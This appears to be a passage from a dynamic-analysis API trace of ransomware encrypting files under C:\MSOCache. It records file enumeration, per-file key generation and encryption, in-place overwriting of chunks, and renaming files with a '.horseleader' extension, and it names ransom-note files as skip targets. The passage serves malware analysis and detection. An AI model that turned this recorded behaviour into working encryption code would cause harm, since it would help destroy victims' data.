[0211.702] GetProcessHeap () returned 0x780000 [0211.702] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0211.702] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c333b00, ftCreationTime.dwHighDateTime=0x1cacc53, ftLastAccessTime.dwLowDateTime=0x8c333b00, ftLastAccessTime.dwHighDateTime=0x1cacc53, ftLastWriteTime.dwLowDateTime=0xe86b5a80, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa0200, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="msvcr90.dll", cAlternateFileName="")) returned 1 [0211.702] lstrcmpiW (lpString1="msvcr90.dll", lpString2="Windows") returned -1 [0211.702] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 78 [0211.703] StrStrIW (lpFirst="msvcr90.dll", lpSrch=".horseleader") returned 0x0 [0211.703] lstrcmpW (lpString1="msvcr90.dll", lpString2="#Decrypt#.txt") returned 1 [0211.703] lstrcmpW (lpString1="msvcr90.dll", lpString2="_uninstalling_.png") returned 1 [0211.703] lstrlenW (lpString=".testttjffg") returned 11 [0211.703] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll", lpSrch=".testttjffg") returned 0x0 [0211.703] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0211.703] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0211.703] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0211.703] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 78 [0211.703] StrStrW (lpFirst="msvcr90.dll", lpSrch=".txt") returned 0x0 [0211.703] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=655872) returned 1 [0211.703] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.704] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.721] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.722] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.722] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x4d900, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.722] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.837] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.838] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.838] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x9b200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.838] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.841] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.841] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.841] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.841] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0211.841] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0211.842] CloseHandle (hObject=0x21c) returned 1 [0211.845] GetProcessHeap () returned 0x780000 [0211.845] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0211.845] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.horseleader") returned 90 [0211.845] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll.horseleader")) returned 1 [0211.846] GetProcessHeap () returned 0x780000 [0211.846] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0211.846] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3ba05100, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3ba05100, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7e3b3f0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd79282, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OfficeLR.cab", cAlternateFileName="")) returned 1 [0211.846] lstrcmpiW (lpString1="OfficeLR.cab", lpString2="Windows") returned -1 [0211.846] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 79 [0211.846] StrStrIW (lpFirst="OfficeLR.cab", lpSrch=".horseleader") returned 0x0 [0211.846] lstrcmpW (lpString1="OfficeLR.cab", lpString2="#Decrypt#.txt") returned 1 [0211.846] lstrcmpW (lpString1="OfficeLR.cab", lpString2="_uninstalling_.png") returned 1 [0211.846] lstrlenW (lpString=".testttjffg") returned 11 [0211.846] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab", lpSrch=".testttjffg") returned 0x0 [0211.846] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0211.846] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0211.846] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0211.847] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 79 [0211.847] StrStrW (lpFirst="OfficeLR.cab", lpSrch=".txt") returned 0x0 [0211.847] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=14127746) returned 1 [0211.847] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.847] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.882] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.882] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.882] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x6ba141, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.882] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.895] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.895] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.895] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xd74282, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.895] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.943] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.943] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.943] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.943] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0211.943] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0211.943] CloseHandle (hObject=0x21c) returned 1 [0211.944] GetProcessHeap () returned 0x780000 [0211.944] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0211.944] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.horseleader") returned 91 [0211.944] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab.horseleader")) returned 1 [0211.944] GetProcessHeap () returned 0x780000 [0211.944] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0211.944] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3cd17e00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3cd17e00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7c4ba40, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x387e00, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OfficeMUI.msi", cAlternateFileName="OFFICE~2.MSI")) returned 1 [0211.944] lstrcmpiW (lpString1="OfficeMUI.msi", lpString2="Windows") returned -1 [0211.945] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 80 [0211.945] StrStrIW (lpFirst="OfficeMUI.msi", lpSrch=".horseleader") returned 0x0 [0211.945] lstrcmpW (lpString1="OfficeMUI.msi", lpString2="#Decrypt#.txt") returned 1 [0211.945] lstrcmpW (lpString1="OfficeMUI.msi", lpString2="_uninstalling_.png") returned 1 [0211.945] lstrlenW (lpString=".testttjffg") returned 11 [0211.945] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi", lpSrch=".testttjffg") returned 0x0 [0211.945] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0211.945] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0211.945] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0211.945] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 80 [0211.945] StrStrW (lpFirst="OfficeMUI.msi", lpSrch=".txt") returned 0x0 [0211.945] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=3702272) returned 1 [0211.945] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.945] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.959] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.959] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.959] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1c1700, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.959] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.969] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.969] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.969] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x382e00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.969] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.984] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.984] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.984] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.984] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0211.984] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0211.985] CloseHandle (hObject=0x21c) returned 1 [0211.985] GetProcessHeap () returned 0x780000 [0211.985] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0211.985] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.horseleader") returned 92 [0211.985] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi.horseleader")) returned 1 [0211.986] GetProcessHeap () returned 0x780000 [0211.986] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0211.986] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7c27050, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x15b5, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OfficeMUI.xml", cAlternateFileName="OFFICE~2.XML")) returned 1 [0211.986] lstrcmpiW (lpString1="OfficeMUI.xml", lpString2="Windows") returned -1 [0211.986] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 80 [0211.986] StrStrIW (lpFirst="OfficeMUI.xml", lpSrch=".horseleader") returned 0x0 [0211.986] lstrcmpW (lpString1="OfficeMUI.xml", lpString2="#Decrypt#.txt") returned 1 [0211.986] lstrcmpW (lpString1="OfficeMUI.xml", lpString2="_uninstalling_.png") returned 1 [0211.986] lstrlenW (lpString=".testttjffg") returned 11 [0211.986] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", lpSrch=".testttjffg") returned 0x0 [0211.986] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0211.986] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0211.986] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0211.987] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 80 [0211.987] StrStrW (lpFirst="OfficeMUI.xml", lpSrch=".txt") returned 0x0 [0211.987] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=5557) returned 1 [0211.987] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x15b5, lpOverlapped=0x0) returned 1 [0211.989] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffea4b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.989] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x15b5, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x15b5, lpOverlapped=0x0) returned 1 [0211.990] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.990] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0211.990] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0211.990] CloseHandle (hObject=0x21c) returned 1 [0211.990] GetProcessHeap () returned 0x780000 [0211.990] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0211.990] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.horseleader") returned 92 [0211.990] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.horseleader")) returned 1 [0211.991] GetProcessHeap () returned 0x780000 [0211.991] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0211.991] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7b68970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OfficeMUISet.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0211.991] lstrcmpiW (lpString1="OfficeMUISet.msi", lpString2="Windows") returned -1 [0211.991] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 83 [0211.991] StrStrIW (lpFirst="OfficeMUISet.msi", 